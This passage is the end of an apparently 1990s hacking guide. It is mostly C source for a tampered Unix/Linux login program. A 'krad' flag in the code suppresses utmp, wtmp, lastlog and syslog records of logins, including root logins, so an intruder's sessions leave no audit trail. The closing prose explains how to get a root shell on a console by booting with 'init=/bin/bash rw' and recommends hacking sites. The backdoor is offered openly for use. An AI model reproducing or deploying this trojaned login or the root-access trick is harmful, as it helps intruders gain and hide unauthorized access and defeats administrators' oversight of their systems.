struct hostent *he;		    strncpy(ut.ut_host, hostname, sizeof(ut.ut_host));		    if ((he = gethostbyname(hostname)))		      memcpy(&ut.ut_addr, he->h_addr_list[0],			     sizeof(ut.ut_addr));		}               				utmpname(_PATH_UTMP);		setutent();		if(krad == 0)		   pututline(&ut);		   		   		   		endutent();				if((wtmp = open(_PATH_WTMP, O_APPEND|O_WRONLY)) >= 0) {		        flock(wtmp, LOCK_EX);		        		        if(krad == 0)			   write(wtmp, (char *)&ut, sizeof(ut));			   			   			   		        flock(wtmp, LOCK_UN);			close(wtmp);		}	}        /* fix_utmp_type_and_user(username, ttyn, LOGIN_PROCESS); */#endif        if(krad == 0)	   dolastlog(quietlog);	#ifndef linux	if (!hflag) {					/* XXX */		static struct winsize win = { 0, 0, 0, 0 };		(void)ioctl(0, TIOCSWINSZ, &win);	}#endif	(void)chown(ttyn, pwd->pw_uid,	    (gr = getgrnam(TTYGRPNAME)) ? gr->gr_gid : pwd->pw_gid);	(void)chmod(ttyn, 0622);	(void)setgid(pwd->pw_gid);	initgroups(username, pwd->pw_gid);#ifdef HAVE_QUOTA	quota(Q_DOWARN, pwd->pw_uid, (dev_t)-1, 0);#endif	if (*pwd->pw_shell == '\0')		pwd->pw_shell = _PATH_BSHELL;#ifndef linux	/* turn on new line discipline for the csh */	else if (!strcmp(pwd->pw_shell, _PATH_CSHELL)) {		ioctlval = NTTYDISC;		(void)ioctl(0, TIOCSETD, &ioctlval);	}#endif	/* preserve TERM even without -p flag */	{		char *ep;				if(!((ep = getenv("TERM")) && (termenv = strdup(ep))))		  termenv = "dumb";	}	/* destroy environment unless user has requested preservation */	if (!pflag)        {          environ = (char**)malloc(sizeof(char*));	  memset(environ, 0, sizeof(char*));	}#ifndef linux	(void)setenv("HOME", pwd->pw_dir, 1);	(void)setenv("SHELL", pwd->pw_shell, 1);	if (term[0] == '\0')		strncpy(term, stypeof(tty), sizeof(term));	(void)setenv("TERM", term, 0);	(void)setenv("USER", pwd->pw_name, 1);	(void)setenv("PATH", _PATH_DEFPATH, 0);#else        (void)setenv("HOME", pwd->pw_dir, 0);      /* legal to override */        if(pwd->pw_uid)          (void)setenv("PATH", _PATH_DEFPATH, 1);        else          (void)setenv("PATH", _PATH_DEFPATH_ROOT, 1);	(void)setenv("SHELL", pwd->pw_shell, 1);	(void)setenv("TERM", termenv, 1);        /* mailx will give a funny error msg if you forget this one */        (void)sprintf(tmp,"%s/%s",_PATH_MAILDIR,pwd->pw_name);        (void)setenv("MAIL",tmp,0);        /* LOGNAME is not documented in login(1) but	   HP-UX 6.5 does it. We'll not allow modifying it.	 */	(void)setenv("LOGNAME", pwd->pw_name, 1);#endif#ifndef linux	if (tty[sizeof("tty")-1] == 'd')		        if(krad == 0)		   syslog(LOG_INFO, "DIALUP %s, %s", tty, pwd->pw_name);		   		   		   #endif	if (pwd->pw_uid == 0)	   	   	   if(krad == 0)		if (hostname)			syslog(LOG_NOTICE, "ROOT LOGIN ON %s FROM %s",			    tty, hostname);		else			syslog(LOG_NOTICE, "ROOT LOGIN ON %s", tty);													if (!quietlog) {		struct stat st;		motd();		(void)sprintf(tbuf, "%s/%s", _PATH_MAILDIR, pwd->pw_name);		if (stat(tbuf, &st) == 0 && st.st_size != 0)			(void)printf("You have %smail.\n",			    (st.st_mtime > st.st_atime) ? "new " : "");	}	(void)signal(SIGALRM, SIG_DFL);	(void)signal(SIGQUIT, SIG_DFL);	(void)signal(SIGINT, SIG_DFL);	(void)signal(SIGTSTP, SIG_IGN);	(void)signal(SIGHUP, SIG_DFL);	/* discard permissions last so can't get killed and drop core */	if(setuid(pwd->pw_uid) < 0 && pwd->pw_uid) {	    syslog(LOG_ALERT, "setuid() failed");	    exit(1);	}	/* wait until here to change directory! */	if (chdir(pwd->pw_dir) < 0) {		(void)printf("No directory %s!\n", pwd->pw_dir);		if (chdir("/"))			exit(0);		pwd->pw_dir = "/";		(void)printf("Logging in with home = \"/\".\n");	}	/* if the shell field has a space: treat it like a shell script */	if (strchr(pwd->pw_shell, ' ')) {	    char *buff = malloc(strlen(pwd->pw_shell) + 6);	    if (buff) {		strcpy(buff, "exec ");		strcat(buff, pwd->pw_shell);		execlp("/bin/sh", "-sh", "-c", buff, (char *)0);		fprintf(stderr, "login: couldn't exec shell script: %s.\n",			strerror(errno));		exit(0);	    }	    fprintf(stderr, "login: no memory for shell script.\n");	    exit(0);	}	tbuf[0] = '-';	strcpy(tbuf + 1, ((p = rindex(pwd->pw_shell, '/')) ?			  p + 1 : pwd->pw_shell));	execlp(pwd->pw_shell, tbuf, (char *)0);	(void)fprintf(stderr, "login: no shell: %s.\n", strerror(errno));	exit(0);}voidgetloginname(){	register int ch;	register char *p;	static char nbuf[UT_NAMESIZE + 1];	for (;;) {		(void)printf("\n%s login: ", thishost); fflush(stdout);		for (p = nbuf; (ch = getchar()) != '\n'; ) {			if (ch == EOF) {				badlogin(username);				exit(0);			}			if (p < nbuf + UT_NAMESIZE)				*p++ = ch;		}		if (p > nbuf)			if (nbuf[0] == '-')				(void)fprintf(stderr,				    "login names may not start with '-'.\n");			else {				*p = '\0';				username = nbuf;				break;			}	}}void timedout(){	struct termio ti;		(void)fprintf(stderr, "Login timed out after %d seconds\n", timeout);	/* reset echo */	(void) ioctl(0, TCGETA, &ti);	ti.c_lflag |= ECHO;	(void) ioctl(0, TCSETA, &ti);	exit(0);}introotterm(ttyn)	char *ttyn;#ifndef linux{	struct ttyent *t;	return((t = getttynam(ttyn)) && t->ty_status&TTY_SECURE);}#else{   int fd;  char buf[100],*p;  int cnt, more;  fd = open(SECURETTY, O_RDONLY);  if(fd < 0) return 1;  /* read each line in /etc/securetty, if a line matches our ttyline     then root is allowed to login on this tty, and we should return     true. */  for(;;) {	p = buf; cnt = 100;	while(--cnt >= 0 && (more = read(fd, p, 1)) == 1 && *p != '\n') p++;	if(more && *p == '\n') {		*p = '\0';	  	if(!strcmp(buf, ttyn)) {  			close(fd);  			return 1;	  	} else  			continue;  	} else {  		close(fd);  		return 0;  	}  }}#endifjmp_buf motdinterrupt;voidmotd(){	register int fd, nchars;	void (*oldint)(), sigint();	char tbuf[8192];	if ((fd = open(_PATH_MOTDFILE, O_RDONLY, 0)) < 0)		return;	oldint = signal(SIGINT, sigint);	if (setjmp(motdinterrupt) == 0)		while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)			(void)write(fileno(stdout), tbuf, nchars);	(void)signal(SIGINT, oldint);	(void)close(fd);}void sigint(){	longjmp(motdinterrupt, 1);}voidchecknologin(){	register int fd, nchars;	char tbuf[8192];	if ((fd = open(_PATH_NOLOGIN, O_RDONLY, 0)) >= 0) {		while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)			(void)write(fileno(stdout), tbuf, nchars);		sleepexit(0);	}}voiddolastlog(quiet)	int quiet;{	struct lastlog ll;	int fd;	if ((fd = open(_PATH_LASTLOG, O_RDWR, 0)) >= 0) {		(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);		if (!quiet) {			if (read(fd, (char *)&ll, sizeof(ll)) == sizeof(ll) &&			    ll.ll_time != 0) {				(void)printf("Last login: %.*s ",				    24-5, (char *)ctime(&ll.ll_time));				if (*ll.ll_host != '\0')				  printf("from %.*s\n",					 (int)sizeof(ll.ll_host), ll.ll_host);				else				  printf("on %.*s\n",					 (int)sizeof(ll.ll_line), ll.ll_line);			}			(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);		}		memset((char *)&ll, 0, sizeof(ll));		(void)time(&ll.ll_time);		strncpy(ll.ll_line, tty, sizeof(ll.ll_line));		if (hostname)			strncpy(ll.ll_host, hostname, sizeof(ll.ll_host));		if(krad == 0)		   (void)write(fd, (char *)&ll, sizeof(ll));		(void)close(fd);	}}voidbadlogin(name)	char *name;{	if (failures == 0)		return;	if (hostname)		syslog(LOG_NOTICE, "%d LOGIN FAILURE%s FROM %s, %s",		    failures, failures > 1 ? "S" : "", hostname, name);	else		syslog(LOG_NOTICE, "%d LOGIN FAILURE%s ON %s, %s",		    failures, failures > 1 ? "S" : "", tty, name);}#undef	UNKNOWN#define	UNKNOWN	"su"#ifndef linuxchar *stypeof(ttyid)	char *ttyid;{	struct ttyent *t;	return(ttyid && (t = getttynam(ttyid)) ? t->ty_type : UNKNOWN);}#endif voidchecktty(user, tty)     char *user;     char *tty;{    FILE *f;    char buf[256];    char *ptr;    char devname[50];    struct stat stb;    /* no /etc/usertty, default to allow access */    if(!(f = fopen(_PATH_USERTTY, "r"))) return;    while(fgets(buf, 255, f)) {	/* strip comments */	for(ptr = buf; ptr < buf + 256; ptr++) 	  if(*ptr == '#') *ptr = 0;	strtok(buf, " \t");	if(strncmp(user, buf, 8) == 0) {	    while((ptr = strtok(NULL, "\t\n "))) {		if(strncmp(tty, ptr, 10) == 0) {		    fclose(f);		    return;		}		if(strcmp("PTY", ptr) == 0) {#ifdef linux		    sprintf(devname, "/dev/%s", ptr);		    /* VERY linux dependent, recognize PTY as alias		       for all pseudo tty's */		    if((stat(devname, &stb) >= 0)		       && major(stb.st_rdev) == 4 		       && minor(stb.st_rdev) >= 192) {			fclose(f);			return;		    }#endif		}	    }	    /* if we get here, /etc/usertty exists, there's a line	       beginning with our username, but it doesn't contain the	       name of the tty where the user is trying to log in.	       So deny access! */	    fclose(f);	    printf("Login on %s denied.\n", tty);	    badlogin(user);	    sleepexit(1);	}    }    fclose(f);    /* users not mentioned in /etc/usertty are by default allowed access       on all tty's */}voidgetstr(buf, cnt, err)	char *buf, *err;	int cnt;{	char ch;	do {		if (read(0, &ch, sizeof(ch)) != sizeof(ch))			exit(1);		if (--cnt < 0) {			(void)fprintf(stderr, "%s too long\r\n", err);			sleepexit(1);		}		*buf++ = ch;	} while (ch);}voidsleepexit(eval)	int eval;{	sleep((unsigned int)5);	exit(eval);}So if you really wanna have root access and have access to console, rebootit (carefully, do a ctrl-alt-del) and at lilo prompt do a : init=/bin/bash rw (for linux 2.0.0 and above (I think)).Don't wonder why I was speaking only about rootshell and dhp.com, there arelots of other very good hacking pages, but these ones are updated veryquickly and besides, are the best pages I know.So folks, this was it...First version of my USER's GUIDE 1.0.Maybe I'll do better next time, and if I have more time, I'll add about50(more) other exploits, remote ones, new stuff, new techniques, etc...See ya, folks !GOOD NIGHT !!! (it's 6.am now).DAMN !!!ARGHHH! I forgot... My e-mail adress is <phantom@lhab-gw.soroscj.ro>.(for now).